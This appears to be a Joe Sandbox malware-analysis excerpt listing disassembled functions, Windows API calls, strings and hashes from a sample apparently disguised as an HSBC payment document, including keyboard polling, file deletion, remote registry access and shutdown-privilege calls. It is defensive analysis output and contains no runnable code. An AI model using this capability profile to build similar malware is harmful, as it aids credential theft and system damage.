Part of subcall function 00784385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007843A0

FindNextFileW.KERNEL32(00000000,?), ref: 0078F16E
FindClose.KERNEL32(00000000), ref: 0078F179
FindFirstFileW.KERNEL32(*.*,?), ref: 0078F195
_wcscmp.LIBCMT ref: 0078F1BC
_wcscmp.LIBCMT ref: 0078F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 0078F1E5
SetCurrentDirectoryW.KERNEL32(007D8920), ref: 0078F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 0078F20D
FindClose.KERNEL32(00000000), ref: 0078F21A
FindClose.KERNEL32(00000000), ref: 0078F22C

Strings

*.*, xrefs: 0078F190

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 84e2f6fad7901cac6bac4f6e40d5fa8f3df25de4abbb5516a72b4db08ee961f7
Instruction ID: bea906ef70414d45c20191ad1476cb6c4e5b5bd9fc89906769471fce26214130
Opcode Fuzzy Hash: 84e2f6fad7901cac6bac4f6e40d5fa8f3df25de4abbb5516a72b4db08ee961f7
Instruction Fuzzy Hash: 3231E73654021DAADF10BBB4EC59BEEB7BCAF85360F104175E804E21A0DB38DE45CB68

Function 0078A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0078A20F
__swprintf.LIBCMT ref: 0078A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 0078A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0078A293
_memset.LIBCMT ref: 0078A2B2
_wcsncpy.LIBCMT ref: 0078A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0078A323
CloseHandle.KERNEL32(00000000), ref: 0078A32E
RemoveDirectoryW.KERNEL32(?), ref: 0078A337
CloseHandle.KERNEL32(00000000), ref: 0078A341

Strings

\, xrefs: 0078A247
\??\%s, xrefs: 0078A22B
:, xrefs: 0078A252

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: c45c89612674d4525d0e1fb60e92f5a02694ce870c6723320975fe8ad8d7a8ad
Instruction ID: 06c2fa453dcab1567c918baffbf8e7522404d899263e46953d0b794eb1f34b64
Opcode Fuzzy Hash: c45c89612674d4525d0e1fb60e92f5a02694ce870c6723320975fe8ad8d7a8ad
Instruction Fuzzy Hash: 3D318EB1940109BBDB219FA0DC49FEB37BCEF89740F1041B6F508D2160EB7896448B25

Function 0078001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00780097
SetKeyboardState.USER32(?), ref: 00780102
GetAsyncKeyState.USER32(000000A0), ref: 00780122
GetKeyState.USER32(000000A0), ref: 00780139
GetAsyncKeyState.USER32(000000A1), ref: 00780168
GetKeyState.USER32(000000A1), ref: 00780179
GetAsyncKeyState.USER32(00000011), ref: 007801A5
GetKeyState.USER32(00000011), ref: 007801B3
GetAsyncKeyState.USER32(00000012), ref: 007801DC
GetKeyState.USER32(00000012), ref: 007801EA
GetAsyncKeyState.USER32(0000005B), ref: 00780213
GetKeyState.USER32(0000005B), ref: 00780221

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: e1dabb61a64b83f86965786d5fc5ee6b758623e382b190c2e18e9ab34b5c76a3
Instruction ID: 4b84743c4657321d4e392361706be645e58354150cdb9df2a6664a15d724eb3c
Opcode Fuzzy Hash: e1dabb61a64b83f86965786d5fc5ee6b758623e382b190c2e18e9ab34b5c76a3
Instruction Fuzzy Hash: F451DB209447886DFB75FBA088597EABFB49F01380F084599D5C2565C3DAAC9B8CC7E1

Function 007A03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 007A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079FDAD,?,?), ref: 007A0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007A04AC

Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007A054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007A05E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007A0822
RegCloseKey.ADVAPI32(00000000), ref: 007A082F

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 53fdc817969d784f6137202f5f46c7dbfea197f96dfb145eff68820e380fa200
Instruction ID: f11164dc557c2e0801f42ff14b2b4f36eea2a26700114f74ef0b0bea8f3460f9
Opcode Fuzzy Hash: 53fdc817969d784f6137202f5f46c7dbfea197f96dfb145eff68820e380fa200
Instruction Fuzzy Hash: 55E13D71604214EFCB14DF24C895E2ABBE5FF8A314F04896DF94ADB261DA38ED05CB91

Function 007983BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC

CoInitialize.OLE32 ref: 00798403
CoUninitialize.OLE32 ref: 0079840E
CoCreateInstance.OLE32(?,00000000,00000017,007B2BEC,?), ref: 0079846E
IIDFromString.OLE32(?,?), ref: 007984E1
VariantInit.OLEAUT32(?), ref: 0079857B
VariantClear.OLEAUT32(?), ref: 007985DC

Strings

NULL Pointer assignment, xrefs: 007984B3
Failed to create object, xrefs: 00798479, 0079852F
Invalid parameter, xrefs: 007984FA

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: aee06a36967ba8c740d04e4aad6bfc3ab0186d1895775aefa1dcb25588f85ab9
Instruction ID: 3252d0c50f525aa63932d34359b997eda0aa04081c2ae151d59518767d9833eb
Opcode Fuzzy Hash: aee06a36967ba8c740d04e4aad6bfc3ab0186d1895775aefa1dcb25588f85ab9
Instruction Fuzzy Hash: 3361C070608312DFCB50DF64E848F6AB7E4AF4A754F044419F9859B2A1CB78ED48CB93

Function 00794164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0079418B
EmptyClipboard.USER32 ref: 00794191
GlobalAlloc.KERNEL32(00000002,?), ref: 007941A6
CloseClipboard.USER32 ref: 00794245

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 8ddfa60449ab414f350ed1aabde932e4b84777f4f7a842408dec4e5b34b211c9
Instruction ID: 20798b5da3f28cabfaabef2b59eb4424234b1de4e586663e7188da384cb5c03c
Opcode Fuzzy Hash: 8ddfa60449ab414f350ed1aabde932e4b84777f4f7a842408dec4e5b34b211c9
Instruction Fuzzy Hash: 2221AD35201614DFDB10AF60EC09F6D7BA8FF45310F04C02AFA46DB2A1CB38A802CB48

Function 007837EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00724750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00724743,?,?,007237AE,?), ref: 00724770

Part of subcall function 00784A31: GetFileAttributesW.KERNEL32(?,0078370B), ref: 00784A32

FindFirstFileW.KERNEL32(?,?), ref: 007838A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0078394B
MoveFileW.KERNEL32(?,?), ref: 0078395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0078397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 0078399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 007839B9

Strings

\*.*, xrefs: 0078384E, 00783857, 0078386C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 0beb8d4c92bfbd090482224784b8513e6f305a06659fdd0d8a327abbabcf6867
Instruction ID: 7ec83d60b68094c37d8255f53031fba433ecb97e843d578e258c22d6bf170032
Opcode Fuzzy Hash: 0beb8d4c92bfbd090482224784b8513e6f305a06659fdd0d8a327abbabcf6867
Instruction Fuzzy Hash: 5651CD3184115DEACF05FBA4EA969EDB778AF11300F604069E846B7192EF396F09CB61

Function 0078F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0078F440
Sleep.KERNEL32(0000000A), ref: 0078F470
_wcscmp.LIBCMT ref: 0078F484
_wcscmp.LIBCMT ref: 0078F49F
FindNextFileW.KERNEL32(?,?), ref: 0078F53D
FindClose.KERNEL32(00000000), ref: 0078F553

Strings

*.*, xrefs: 0078F425

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: a20395d07e9896f8e3847f7d29f4a0bdd6fcfc79f5f9204753a6843974a829a4
Instruction ID: 674d563e8852d1a4206446eddce663dcc8d9a85745021dc4b3e4c15d0d4b7568
Opcode Fuzzy Hash: a20395d07e9896f8e3847f7d29f4a0bdd6fcfc79f5f9204753a6843974a829a4
Instruction Fuzzy Hash: EC415E71940219DFCF14EFA4DC49AEEBBB4FF05310F14456AE819A2191DB389E95CF60

Function 00733030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

_s, xrefs: 00733322
3cs, xrefs: 00733225

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3cs$_s
API String ID: 674341424-944816363
Opcode ID: 244b6b610868cd047ae30acfc3c3db29635bac460e2bf66e1d1248b9983f7698
Instruction ID: 20a7a1662b433708eaba50c82d4a2d046a010718ce83f44440a25d81ccfe3a6d
Opcode Fuzzy Hash: 244b6b610868cd047ae30acfc3c3db29635bac460e2bf66e1d1248b9983f7698
Instruction Fuzzy Hash: 7222BB71608350DFE724DF24C885B6EB7E4BF84310F44492CF99A97292DB39EA04CB92

Function 00735760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007358A5
_memmove.LIBCMT ref: 007358F5
_memmove.LIBCMT ref: 0073595B

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 398223feb28f2a1ddc71a62a9b3477e0c63418d06afabc95f246e09e6d3badba
Instruction ID: 0396e9e6a6d4b9a36e719e12783e09c46e4170faaff2252e5ae480b6d1efea36
Opcode Fuzzy Hash: 398223feb28f2a1ddc71a62a9b3477e0c63418d06afabc95f246e09e6d3badba
Instruction Fuzzy Hash: CB129D70A00619DFDF14DFA5D985AEEB7F5FF48300F108529E44AE7251EB3AA920CB91

Function 00783B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00724750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00724743,?,?,007237AE,?), ref: 00724770

Part of subcall function 00784A31: GetFileAttributesW.KERNEL32(?,0078370B), ref: 00784A32

FindFirstFileW.KERNEL32(?,?), ref: 00783B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00783BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00783BEA
FindClose.KERNEL32(00000000), ref: 00783C01
FindClose.KERNEL32(00000000), ref: 00783C0A

Strings

\*.*, xrefs: 00783B5B

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: fbf009fdcc989ef85b8a887277d680e30b34657596cf8b3e0c750df005c6cb4d
Instruction ID: 36d15142befff67dfc8f4aab176e34f529e07b1d2cd31329eefe6e74488047d8
Opcode Fuzzy Hash: fbf009fdcc989ef85b8a887277d680e30b34657596cf8b3e0c750df005c6cb4d
Instruction Fuzzy Hash: F431A171048395DBC304FF68D9959AFBBE8BE92310F404E2DF4D592191EB29DA08C767

Function 007851BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 007787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0077882B
Part of subcall function 007787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00778858
Part of subcall function 007787E1: GetLastError.KERNEL32 ref: 00778865

ExitWindowsEx.USER32(?,00000000), ref: 007851F9

Strings

SeShutdownPrivilege, xrefs: 007851C9
@, xrefs: 007851EC
, xrefs: 007851E7

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: e1d2531754014bfb0d9390c098686e525308ee5eb2861e9ed433946641705fff
Instruction ID: 5af88e3cae4c2c9e248fc31f6b36b4fa8b3c790e141739f8a2741f02cad7088d
Opcode Fuzzy Hash: e1d2531754014bfb0d9390c098686e525308ee5eb2861e9ed433946641705fff
Instruction Fuzzy Hash: CE012BB17D16156BFB2872B89C8EFBB7258FB05781F204425F957E20D2DD5D1C008794

Function 0072FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

pb~, xrefs: 007649B9
%{, xrefs: 0072FCF3

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: BuffCharUpper
String ID: pb~$%{
API String ID: 3964851224-2839119673
Opcode ID: 788ed155929db43feb767ce9b3d208ee33edb11c8a47d0477f8c6b3d472175c7
Instruction ID: 60c3a209c7f7ddfa7ff53f1be9efa22dca687d4bec6983be9eef04793576e8f5
Opcode Fuzzy Hash: 788ed155929db43feb767ce9b3d208ee33edb11c8a47d0477f8c6b3d472175c7
Instruction Fuzzy Hash: 4E928C70A08351DFE724DF24C494B2AB7E1BF85304F14896DE98A8B362D779EC45CB92

Function 00796283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007962DC
WSAGetLastError.WSOCK32(00000000), ref: 007962EB
bind.WSOCK32(00000000,?,00000010), ref: 00796307
listen.WSOCK32(00000000,00000005), ref: 00796316
WSAGetLastError.WSOCK32(00000000), ref: 00796330
closesocket.WSOCK32(00000000,00000000), ref: 00796344

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 594a71168f5b94487acda9a8448a8b69efdacb5ccfacffe2cd63598469509e14
Instruction ID: a4e1f6f3438f40aa4fd5632519324e6a139cf0df4bfad5f31e7e10e93ce9d390
Opcode Fuzzy Hash: 594a71168f5b94487acda9a8448a8b69efdacb5ccfacffe2cd63598469509e14
Instruction Fuzzy Hash: B021D071600210DFCF10EF64EC89A6EB7E9EF89720F188259E956A7391C778AC01CB51

Function 00735520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00740DB6: std::exception::exception.LIBCMT ref: 00740DEC
Part of subcall function 00740DB6: __CxxThrowException@8.LIBCMT ref: 00740E01

_memmove.LIBCMT ref: 00770258
_memmove.LIBCMT ref: 0077036D
_memmove.LIBCMT ref: 00770414

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 0acc1d98ba415f1b80887013fa23328282c3ebce23c84c8b760c24d82d22bc7b
Instruction ID: 33182b41ee9f9334049d03416311ced95f6401e911533f4faf1dd9ed80ba5128
Opcode Fuzzy Hash: 0acc1d98ba415f1b80887013fa23328282c3ebce23c84c8b760c24d82d22bc7b
Instruction Fuzzy Hash: 9202DFB0A00219DBDF04DF64D985AAEBBB5FF44340F54C069E80ADB256EB39E950CB91

Function 00721287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623

DefDlgProcW.USER32(?,?,?,?,?), ref: 007219FA
GetSysColor.USER32(0000000F), ref: 00721A4E
SetBkColor.GDI32(?,00000000), ref: 00721A61

Part of subcall function 00721290: DefDlgProcW.USER32(?,00000020,?), ref: 007212D8

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 776bd04ac6e0c8d79575c65a459e501c22f88f71fc7fc8dca46f0ef23863aab5
Instruction ID: 97de91a2b1be3d1063012bbb41ddef3dea72ab47848ecacee6e906504a25e3bc
Opcode Fuzzy Hash: 776bd04ac6e0c8d79575c65a459e501c22f88f71fc7fc8dca46f0ef23863aab5
Instruction Fuzzy Hash: FBA190711025B4FED7389B387C49EBF366CFFA6342B948219F402D5192CB6EAD0192B5

Function 00796747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00797D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00797DB6

